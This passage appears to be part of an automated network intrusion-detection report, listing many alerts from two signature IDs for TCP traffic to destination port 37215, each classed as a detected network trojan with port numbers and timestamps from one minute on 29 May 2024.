                SID:2835222
                Source Port:41370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.970428
                SID:2835222
                Source Port:46148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942994
                SID:2835222
                Source Port:55872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.239604
                SID:2835222
                Source Port:48408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767759
                SID:2835222
                Source Port:38836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947291
                SID:2829579
                Source Port:55188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897384
                SID:2835222
                Source Port:59024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.041756
                SID:2829579
                Source Port:32828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598160
                SID:2835222
                Source Port:54892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885528
                SID:2829579
                Source Port:54000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948614
                SID:2835222
                Source Port:40636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965440
                SID:2829579
                Source Port:51782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780604
                SID:2835222
                Source Port:37790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071695
                SID:2829579
                Source Port:58786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.393477
                SID:2829579
                Source Port:53864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783916
                SID:2835222
                Source Port:51896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776495
                SID:2835222
                Source Port:44544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277555
                SID:2835222
                Source Port:46870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899150
                SID:2829579
                Source Port:54444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.605698
                SID:2835222
                Source Port:49396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715254
                SID:2829579
                Source Port:56540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160887
                SID:2829579
                Source Port:55038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170171
                SID:2835222
                Source Port:33694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.459035
                SID:2835222
                Source Port:43886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507410
                SID:2829579
                Source Port:58960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966405
                SID:2829579
                Source Port:49492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170488
                SID:2829579
                Source Port:36146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075322
                SID:2829579
                Source Port:41548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.963066
                SID:2835222
                Source Port:60848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227951
                SID:2835222
                Source Port:45338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010748
                SID:2835222
                Source Port:42840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421008
                SID:2835222
                Source Port:42296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653031
                SID:2835222
                Source Port:59494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.523845
                SID:2835222
                Source Port:33850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963190
                SID:2835222
                Source Port:58702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598002
                SID:2835222
                Source Port:34610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227840
                SID:2835222
                Source Port:52434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858968
                SID:2829579
                Source Port:45408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.962769
                SID:2829579
                Source Port:58004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997868
                SID:2835222
                Source Port:33286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026435
                SID:2829579
                Source Port:42404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858833
                SID:2829579
                Source Port:59404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233261
                SID:2829579
                Source Port:58956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276727
                SID:2835222
                Source Port:60128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436410
                SID:2829579
                Source Port:36812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947812
                SID:2829579
                Source Port:60624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231385
                SID:2829579
                Source Port:42652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212172
                SID:2835222
                Source Port:59794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113313
                SID:2829579
                Source Port:49672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.230413
                SID:2835222
                Source Port:40494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083631
                SID:2829579
                Source Port:56258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169155
                SID:2829579
                Source Port:58666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809311
                SID:2829579
                Source Port:52442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.392612
                SID:2835222
                Source Port:59942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361354
                SID:2829579
                Source Port:52986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881743
                SID:2829579
                Source Port:50766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.516105
                SID:2835222
                Source Port:33692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.282562
                SID:2835222
                Source Port:56854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.438901
                SID:2829579
                Source Port:48570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328306
                SID:2835222
                Source Port:33862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620851
                SID:2835222
                Source Port:38378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981512
                SID:2835222
                Source Port:44922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815642
                SID:2829579
                Source Port:33264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281696
                SID:2835222
                Source Port:43632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968420
                SID:2835222
                Source Port:44358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520465
                SID:2835222
                Source Port:50846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436320
                SID:2835222
                Source Port:40748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277724
                SID:2835222
                Source Port:57234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155641
                SID:2829579
                Source Port:42718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223287
                SID:2829579
                Source Port:41002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644891
                SID:2829579
                Source Port:42168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764346
                SID:2835222
                Source Port:46842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586766
                SID:2835222
                Source Port:34904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.228896
                SID:2835222
                Source Port:59388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042514
                SID:2835222
                Source Port:54672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981394
                SID:2829579
                Source Port:43070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983742
                SID:2829579
                Source Port:45978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.770825
                SID:2829579
                Source Port:36540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038167
                SID:2829579
                Source Port:59396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263387
                SID:2835222
                Source Port:46062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667442
                SID:2835222
                Source Port:57440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878295
                SID:2835222
                Source Port:50144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935803
                SID:2829579
                Source Port:49310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287315
                SID:2835222
                Source Port:48302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140958
                SID:2835222
                Source Port:39516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257160
                SID:2835222
                Source Port:59622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992939
                SID:2835222
                Source Port:57940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726089
                SID:2835222
                Source Port:58800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873642
                SID:2835222
                Source Port:40730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986724
                SID:2835222
                Source Port:47950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813025
                SID:2829579
                Source Port:34788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032706
                SID:2829579
                Source Port:37018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981317
                SID:2835222
                Source Port:36118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208061
                SID:2829579
                Source Port:43438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.718437
                SID:2829579
                Source Port:55924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.688833
                SID:2829579
                Source Port:53220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507030
                SID:2835222
                Source Port:53766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.793635
                SID:2829579
                Source Port:57288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.555878
                SID:2835222
                Source Port:38904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263874
                SID:2835222
                Source Port:52316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.282634
                SID:2835222
                Source Port:56302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508642
                SID:2835222
                Source Port:33508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444317
                SID:2829579
                Source Port:60340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.905203
                SID:2835222
                Source Port:54630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.108923
                SID:2829579
                Source Port:59060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840380
                SID:2835222
                Source Port:43694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586313
                SID:2829579
                Source Port:38504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233836
                SID:2829579
                Source Port:32830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555553
                SID:2835222
                Source Port:48966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915367
                SID:2829579
                Source Port:41316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.617089
                SID:2835222
                Source Port:45474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507383
                SID:2829579
                Source Port:41248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.970025
                SID:2835222
                Source Port:59056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223374
                SID:2835222
                Source Port:60126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.513149
                SID:2829579
                Source Port:52400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.543863
                SID:2829579
                Source Port:53738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421169
                SID:2829579
                Source Port:55430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859394
                SID:2835222
                Source Port:42144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332812
                SID:2835222
                Source Port:59822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957741
                SID:2835222
                Source Port:35382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992853
                SID:2829579
                Source Port:43564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639596
                SID:2835222
                Source Port:51670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.801370
                SID:2829579
                Source Port:44176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.703396
                SID:2829579
                Source Port:49648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.387224
                SID:2829579
                Source Port:60642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227121
                SID:2829579
                Source Port:50228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154446
                SID:2835222
                Source Port:47396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.029592
                SID:2829579
                Source Port:60874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173182
                SID:2835222
                Source Port:46544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177199
                SID:2829579
                Source Port:39400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665177
                SID:2835222
                Source Port:35574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136088
                SID:2829579
                Source Port:53778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912900
                SID:2829579
                Source Port:47020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616221
                SID:2829579
                Source Port:39682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.975255
                SID:2829579
                Source Port:54860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878625
                SID:2829579
                Source Port:45348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630471
                SID:2829579
                Source Port:34654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980031
                SID:2829579
                Source Port:47736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836436
                SID:2835222
                Source Port:45400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506952
                SID:2835222
                Source Port:48604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887934
                SID:2835222
                Source Port:41956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.738331
                SID:2835222
                Source Port:37200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735512
                SID:2829579
                Source Port:49224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.028716
                SID:2829579
                Source Port:34790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.548717
                SID:2835222
                Source Port:42762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782998
                SID:2835222
                Source Port:41292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.446300
                SID:2835222
                Source Port:58122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896912
                SID:2835222
                Source Port:40838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659819
                SID:2829579
                Source Port:47064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369813
                SID:2835222
                Source Port:56836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.238947
                SID:2835222
                Source Port:55334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421140
                SID:2829579
                Source Port:35634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716523
                SID:2829579
                Source Port:49940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325662
                SID:2829579
                Source Port:48332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738444
                SID:2829579
                Source Port:51982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.451320
                SID:2829579
                Source Port:45938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521679
                SID:2829579
                Source Port:33320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782578
                SID:2835222
                Source Port:59740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654723
                SID:2835222
                Source Port:37460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862901
                SID:2835222
                Source Port:56316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032418
                SID:2829579
                Source Port:36176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514701
                SID:2835222
                Source Port:41380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584149
                SID:2829579
                Source Port:39058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221462
                SID:2835222
                Source Port:54140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731995
                SID:2835222
                Source Port:34812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265707
                SID:2829579
                Source Port:38162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985392
                SID:2835222
                Source Port:47606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.564899
                SID:2829579
                Source Port:47218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817119
                SID:2835222
                Source Port:35612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902143
                SID:2829579
                Source Port:43512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381704
                SID:2835222
                Source Port:58974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024698
                SID:2835222
                Source Port:38458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.797738
                SID:2829579
                Source Port:44456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824583
                SID:2829579
                Source Port:45222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375195
                SID:2829579
                Source Port:41418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165925
                SID:2835222
                Source Port:55018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665382
                SID:2829579
                Source Port:56960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.315720
                SID:2835222
                Source Port:42400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384301
                SID:2835222
                Source Port:45608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419161
                SID:2829579
                Source Port:36216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267554
                SID:2829579
                Source Port:46566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.821979
                SID:2829579
                Source Port:50484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925931
                SID:2829579
                Source Port:35028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688198
                SID:2835222
                Source Port:48764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.815534
                SID:2829579
                Source Port:59790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672518
                SID:2829579
                Source Port:37416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855631
                SID:2829579
                Source Port:49442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380341
                SID:2835222
                Source Port:45918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177083
                SID:2835222
                Source Port:34486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.159816
                SID:2829579
                Source Port:53108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113981
                SID:2829579
                Source Port:55728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909945
                SID:2835222
                Source Port:56876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969573
                SID:2835222
                Source Port:55848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660377
                SID:2829579
                Source Port:35380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.861907
                SID:2835222
                Source Port:56550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571570
                SID:2835222
                Source Port:60910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.809732
                SID:2829579
                Source Port:49352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786834
                SID:2835222
                Source Port:50418
                Destination Port:37215
